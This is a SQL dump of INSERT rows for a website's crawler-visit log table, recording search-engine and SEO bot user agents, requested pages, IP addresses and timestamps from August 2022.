INSERT INTO `ey_weapp_spider_visit` VALUES ('97082', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/about/', '116.179.32.168', '1661579182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97191', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/149.html', '185.191.171.15', '1661623919', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97536', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_7.html', '185.191.171.16', '1661778482', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97084', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1661579938', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97166', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/236.html', '114.119.151.155', '1661610109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97089', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/467.html', '185.191.171.13', '1661582150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97090', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_14/', '114.119.151.153', '1661582192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97085', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/327.html', '157.55.39.90', '1661580861', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97086', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/434.html', '114.119.151.153', '1661581020', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97087', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_26/', '114.119.151.155', '1661581628', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97088', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/223.html', '66.249.79.108', '1661581795', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97159', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661608693', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97543', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.106', '1661781815', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97091', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/yqal/list_21_3/', '114.119.151.155', '1661584557', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97542', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/459.html', '114.119.151.153', '1661781699', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97122', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_29.html', '185.191.171.10', '1661597254', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97096', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/154.html', '185.191.171.1', '1661585411', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97106', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_2.html', '185.191.171.20', '1661590247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97117', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.112', '1661595867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97116', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche/', '66.249.79.108', '1661595246', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97144', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1661601915', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97125', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1661597922', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97126', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661597923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97143', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1661601913', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97549', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_65/', '185.191.171.38', '1661784228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97133', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/184.html', '185.191.171.20', '1661599301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97135', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661599575', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97136', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/9_40.html', '66.249.79.112', '1661599843', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97138', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/310.html', '207.46.13.9', '1661600080', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97139', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/324.html', '66.249.79.108', '1661600457', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97556', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/97.html', '185.191.171.20', '1661788483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97557', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/?lailu=www.zztly.cn', '185.191.171.22', '1661788838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97141', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.110', '1661601077', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97142', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/217.html', '66.249.79.108', '1661601094', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97554', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/hangyexinwen/list_18_23/', '66.249.79.106', '1661787110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97555', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/498.html', '185.191.171.14', '1661788463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97551', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661785417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97552', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/492.html', '220.181.108.169', '1661785938', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97151', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qzs.html', '114.119.151.153', '1661607657', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97547', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/214.html', '116.179.32.174', '1661782664', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97152', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/12.html', '220.181.108.114', '1661607865', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97545', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.106', '1661782007', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97546', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/402.html', '17.121.115.115', '1661782334', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97544', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/91.html', '185.191.171.7', '1661781982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97154', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/127.html', '114.119.151.153', '1661608147', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97156', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/486.html', '185.191.171.8', '1661608396', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97175', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/457.html', '216.244.66.194', '1661611349', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97157', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/462.html', '114.119.151.153', '1661608603', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97158', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '220.181.108.110', '1661608689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97173', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_11.html', '116.179.32.159', '1661611139', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97161', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_46/', '114.119.151.153', '1661609104', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97162', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/331.html', '114.119.151.155', '1661609374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97167', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/492.html', '116.179.32.234', '1661610321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97164', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_28/', '114.119.151.153', '1661609604', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97538', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/177.html', '185.191.171.4', '1661778993', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97183', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/195.html', '116.179.32.72', '1661616265', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97185', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_34/', '185.191.171.12', '1661616395', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97187', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/214.html', '220.181.108.114', '1661618940', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97192', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661624163', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97532', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/230.html', '66.249.79.110', '1661777973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97533', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_11.html', '185.191.171.43', '1661778010', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97194', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/buliaoji/', '185.191.171.45', '1661624792', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97197', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/buliaoji/', '17.121.113.75', '1661626814', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97196', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/322.html', '66.249.79.108', '1661624833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97528', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/471.html', '185.191.171.43', '1661775920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97200', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/490.html', '114.119.151.153', '1661628302', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97201', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1661629562', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97203', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/197.html', '185.191.171.44', '1661630424', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97204', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/73.html', '185.191.171.16', '1661630677', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97516', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/372.html', '114.119.151.153', '1661770354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97207', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/351.html', '185.191.171.45', '1661631399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97214', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/buliaoji', '185.191.171.20', '1661636392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97501', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_63/', '216.244.66.194', '1661762120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97502', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lds.html', '114.119.151.155', '1661762609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97500', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661762097', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97221', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1661638529', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97222', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5_4.html', '185.191.171.11', '1661638844', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97218', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661637792', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97219', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/495.html', '185.191.171.25', '1661638041', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97497', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/288.html', '114.119.151.153', '1661761276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97498', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hbs.html', '114.119.151.155', '1661761669', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97220', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/211.html', '114.119.151.155', '1661638394', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97223', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/155.html', '114.119.151.153', '1661639722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97495', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/honor/25.html', '185.191.171.8', '1661759197', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97494', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/163.html', '66.249.79.108', '1661758522', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97225', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/165.html', '114.119.151.155', '1661641022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97226', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/494.html', '66.249.79.110', '1661641390', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97227', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_6.html', '185.191.171.35', '1661641688', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97492', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_41.html', '116.179.32.26', '1661757574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97228', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/122.html', '66.249.79.108', '1661641898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97490', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_20/', '216.244.66.194', '1661756594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97229', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661642050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97230', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.110', '1661642132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97231', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/84.html', '66.249.79.110', '1661642365', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97232', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljwd/list_20_5/', '185.191.171.2', '1661642458', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97487', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/494.html', '66.249.79.112', '1661754578', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97240', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/447.html', '185.191.171.24', '1661644743', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97241', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/324.html', '66.249.79.108', '1661644930', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97242', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/264.html', '66.249.79.110', '1661645164', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97243', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/64.html', '116.179.32.152', '1661645670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97246', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_2/', '66.249.79.110', '1661647363', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97247', '2', 'mozilla/5.0 (compatible; baiduspider/2.0;+http://www.baidu.com/search/spider.html)', '/about/', '36.133.40.17', '1661647559', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97476', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/yqal/list_21_3/', '185.191.171.4', '1661748522', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97250', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.110', '1661647901', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97475', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661746617', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97251', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_16/', '220.181.108.159', '1661648344', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97472', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1661745697', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97252', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tuobeng/', '185.191.171.10', '1661648781', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97471', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/192.html', '216.244.66.194', '1661745085', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97253', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/432.html', '207.46.13.9', '1661649073', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97470', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/463.html', '216.244.66.194', '1661744326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97255', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/368.html', '185.191.171.1', '1661651028', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97469', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/137.html', '66.249.79.112', '1661743796', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97256', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1661652291', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97468', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/493.html', '185.191.171.10', '1661743461', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97420', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/huz.html', '114.119.151.153', '1661715937', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97259', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1661652747', '0');
